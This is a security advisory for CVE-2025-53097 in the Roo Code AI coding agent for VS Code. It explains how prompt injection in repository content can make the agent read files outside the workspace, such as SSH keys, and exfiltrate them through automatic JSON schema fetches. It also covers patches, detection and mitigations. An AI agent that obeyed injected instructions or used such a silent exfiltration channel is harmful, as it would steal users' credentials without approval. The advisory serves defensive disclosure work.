CVE-2025-53097 Overview
CVE-2025-53097 affects Roo Code, an AI-powered autonomous coding agent extension for Visual Studio Code. Versions prior to 3.20.3 contain a flaw in the search_files tool that ignores the user setting restricting reads to the VS Code workspace. An attacker capable of injecting a prompt into the agent can read sensitive files outside the workspace and exfiltrate the contents by writing them into a JSON schema. When schema fetching is enabled (the default), the write triggers an outbound network request without prompting the user. The maintainers fixed the issue in version 3.20.3.
Critical Impact
Prompt injection attacks against Roo Code can read arbitrary files outside the VS Code workspace and exfiltrate them via automatic JSON schema network fetches.
Affected Products
- Roo Code VS Code extension versions prior to 3.20.3
- Deployments with default JSON schema fetching enabled in VS Code
- Roocode Roo Code (cpe:2.3:a:roocode:roo_code)
Discovery Timeline
- 2025-06-27 - CVE-2025-53097 published to NVD
- 2025-09-15 - Last updated in NVD database
Technical Details for CVE-2025-53097
Vulnerability Analysis
The vulnerability is classified as Improper Neutralization of Special Elements in Output Used by a Downstream Component [CWE-74]. Roo Code exposes a search_files tool to its agent loop. Users can configure the agent to limit reads to the active VS Code workspace. Prior to 3.20.3, search_files did not enforce this boundary check. An attacker who controls agent prompts, through indirect prompt injection in source files, documentation, or external content, can direct the agent to enumerate paths outside the workspace.
The exfiltration channel chains the read primitive with VS Code's automatic JSON schema resolution. Writing a remote $schema URL into a JSON file causes VS Code to issue an HTTP request to fetch the schema. By embedding stolen file contents into the schema URL or related fields, the attacker triggers an outbound request that leaks data without user approval.
Root Cause
The searchFilesTool implementation in src/core/tools/searchFilesTool.ts did not call isPathOutsideWorkspace to gate access against the alwaysAllowReadOnlyOutsideWorkspace setting. The auto-approve logic that protects other read tools was missing from this code path.
Attack Vector
Exploitation requires the attacker to deliver a prompt to the agent. Prompt injection vectors include malicious comments in third-party repositories, README files, dependency documentation, or any content the agent ingests. Once the agent executes, it reads sensitive files such as ~/.ssh/id_rsa or cloud credentials and writes them into a JSON schema reference, triggering automatic outbound retrieval by VS Code.
// Patch excerpt: src/core/tools/searchFilesTool.ts
import { getReadablePath } from "../../utils/path"
import { isPathOutsideWorkspace } from "../../utils/pathUtils"
import { regexSearchFiles } from "../../services/ripgrep"
-import { t } from "../../i18n"
export async function searchFilesTool(
cline: Task,
Source: Roo-Code commit 10b2fb3
A companion patch introduces an alwaysAllowWriteProtected setting and an isProtected message flag to block auto-approving edits to configuration files:
// Patch excerpt: packages/types/src/global-settings.ts
alwaysAllowReadOnlyOutsideWorkspace: z.boolean().optional(),
alwaysAllowWrite: z.boolean().optional(),
alwaysAllowWriteOutsideWorkspace: z.boolean().optional(),
+ alwaysAllowWriteProtected: z.boolean().optional(),
writeDelayMs: z.number().optional(),
Source: Roo-Code commit 7d0b22f
Detection Methods for CVE-2025-53097
Indicators of Compromise
- Outbound HTTP/HTTPS requests from VS Code processes to attacker-controlled domains referenced in $schema fields.
- Roo Code agent transcripts showing search_files invocations with absolute paths outside the configured workspace.
- Newly created or modified .json files containing unfamiliar $schema URLs.
Detection Strategies
- Audit Roo Code task logs for search_files calls referencing paths matching ~, /etc, /home, or user credential directories.
- Inspect installed Roo Code extension version and flag any host running a release earlier than 3.20.3.
- Monitor developer endpoints for VS Code child processes initiating connections to non-allowlisted schema hosts.
Monitoring Recommendations
- Forward VS Code and extension telemetry to a centralized log store and alert on anomalous schema-fetch destinations.
- Track changes to JSON files in repositories where Roo Code is active, focusing on $schema URL modifications.
- Review agent prompt sources, including dependency README files and issue trackers, for embedded instructions targeting search_files.
How to Mitigate CVE-2025-53097
Immediate Actions Required
- Upgrade Roo Code to version 3.20.3 or later across all developer workstations.
- Disable JSON schema downloads in VS Code by setting json.schemaDownload.enable to false until updates are verified.
- Restrict Roo Code to operate only on trusted repositories and review auto-approve settings for read and write tools.
Patch Information
The fix is delivered in Roo Code 3.20.3. Commit 10b2fb3 adds the workspace boundary check to searchFilesTool, and commit 7d0b22f introduces protections against auto-approving edits to configuration files. See the GitHub Security Advisory GHSA-wr2q-46pg-f228 for full details.
Workarounds
- Set alwaysAllowReadOnlyOutsideWorkspace to false and require manual approval for all read operations.
- Disable VS Code automatic JSON schema fetching to remove the exfiltration channel.
- Run the IDE under an account without access to sensitive files such as SSH keys or cloud credentials.
# VS Code settings.json - reduce exposure until patched
{
"json.schemaDownload.enable": false,
"roo-code.alwaysAllowReadOnlyOutsideWorkspace": false,
"roo-code.alwaysAllowWriteOutsideWorkspace": false
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
